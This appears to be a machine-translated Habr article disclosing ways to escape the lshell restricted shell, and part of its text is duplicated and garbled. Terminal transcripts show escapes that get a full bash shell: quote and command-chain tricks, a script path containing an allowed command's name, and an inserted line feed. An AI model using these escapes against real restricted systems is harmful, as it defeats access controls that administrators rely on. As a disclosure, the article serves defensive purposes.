0day vulnerabilities in lshell
lshell is a shell that restricts the commands and file system paths available to the user. It is tipped as an alternative to a complex chroot setting:
and so on, there are many sources offering it for use.
The application is available in the repositories of Ubuntu, Debian and EPEL.
A quick look at the notes on lshell in the configuration files can be noticed that some of the restrictions imposed by lshell serve to simplify the parsing of commands, and not to increase security. For example, prohibiting the use of semicolons and sabshells. It makes sense to look at how this parsing is implemented.
When examining the source code, it becomes clear that the selection of the command to be launched and its arguments is made by the library , which is designed for parsing commands from simple CLI and does not parse the correctly complex shell command syntax. At the same time, regardless of the warning in the documentation , after simple validation, the command is passed to the shell / bin / sh . Validation deserves special attention and is based on the assumptions that:
There is no real syntax parsing anywhere, so these are not all the assumptions made in the verification.
')
The following scenarios are available for escaping from such a limited shell.
This software solution is too far from the state in which it can be safely used. Therefore, the best way out is to stop its operation.
and so on, there are many sources offering it for use.
The application is available in the repositories of Ubuntu, Debian and EPEL.
Problems in the code
A quick look at the notes on lshell in the configuration files can be noticed that some of the restrictions imposed by lshell serve to simplify the parsing of commands, and not to increase security. For example, prohibiting the use of semicolons and sabshells. It makes sense to look at how this parsing is implemented.
When examining the source code, it becomes clear that the selection of the command to be launched and its arguments is made by the library , which is designed for parsing commands from simple CLI and does not parse the correctly complex shell command syntax. At the same time, regardless of the warning in the documentation , after simple validation, the command is passed to the shell / bin / sh . Validation deserves special attention and is based on the assumptions that:
- team is always single line
- inside the quotes do not need to check
There is no real syntax parsing anywhere, so these are not all the assumptions made in the verification.
')
Consequences
The following scenarios are available for escaping from such a limited shell.
Scenario 1: exploitation problems with quotes and command chains
GH Issue
vladislav @ dt1: ~ $ getent passwd testuser
testuser: x: 1002: 1003: ,,,: / home / testuser: / usr / bin / lshell
vladislav @ dt1: ~ $ su - testuser
Password:
You are in a limited shell.
Type '?' or 'help' to get the list of allowed commands
testuser: ~ $?
cd clear echo exit help history ll lpath ls lsudo
testuser: ~ $ ls
examples.desktop
testuser: ~ $ which bash
*** forbidden command: which
testuser: ~ $ ls'usb '
Bus 002 Device 001: ID 1d6b: 0003 Linux Foundation 3.0 root hub
Bus 001 Device 006: ID 046d: c05a Logitech, Inc. M90 / M100 Optical Mouse
Bus 001 Device 002: ID 046d: c31c Logitech, Inc. Keyboard K120
Bus 001 Device 001: ID 1d6b: 0002 Linux Foundation 2.0 root hub
testuser: ~ $ echo && 'bash'
testuser @ dt1: ~ $ PATH = / usr / local / sbin: / usr / local / bin: / usr / sbin: / usr / bin: / sbin: / bin: / usr / games: / usr / local / games: / snap / bin
testuser @ dt1: ~ $ reboot --help
reboot [OPTIONS ...] [ARG]
Reboot the system.
--help Show this help
--halt Halt the machine
-p --poweroff Switch off the machine
--reboot Reboot the machine
-f --force Force immediate halt / power-off / reboot
-w --wtmp-only Don't halt / power-off / reboot, just write wtmp record
-d --no-wtmp Don't write wtmp record
halt / power-off / reboot
GH Issue
Scenario 2: running the script from its home directory, the path to which contains the name of the allowed command
GH Issue
vladislav @ dt1: ~ $ su - testuser Password: You are in a limited shell. Type '?' or 'help' to get the list of allowed commands testuser: ~ $? cd clear echo exit help history ll lpath ls lsudo testuser: ~ $ echo '/ 1.sh' testuser @ dt1: ~ $ cat echo / 1.sh #! / bin / bash / bin / bash testuser @ dt1: ~ $
GH Issue
Scenario 3: Using special terminal sequences
It is enough to start a command with any allowed word, insert a line feed by successively pressing the two key combinations <CTRL + V> <CTRL + J> and enter any desired command on the new line.
GH Issue
vladislav @ dt1: ~ $ getent passwd testuser testuser: x: 1001: 1002: ,,,: / home / testuser: / usr / bin / lshell vladislav @ dt1: ~ $ su - testuser Password: You are in a limited shell. Type '?' or 'help' to get the list of allowed commands testuser: ~ $? cd clear echo exit help history ll lpath ls lsudo testuser: ~ $ bash *** forbidden command: bash testuser: ~ $ echo <CTRL + V> <CTRL + J> bash testuser @ dt1: ~ $ which bash / bin / bash
GH Issue
The best decision
This software solution is too far from the state in which it can be safely used. Therefore, the best way out is to stop its operation.
Source: https://habr.com/ru/post/308028/
All Articles